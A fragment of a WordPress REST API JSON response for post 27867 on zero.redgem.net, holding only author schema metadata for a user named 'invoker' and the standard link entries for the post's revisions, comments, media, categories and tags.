redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/27867","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=27867"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/27867\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=27867"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=27867"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=27867"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}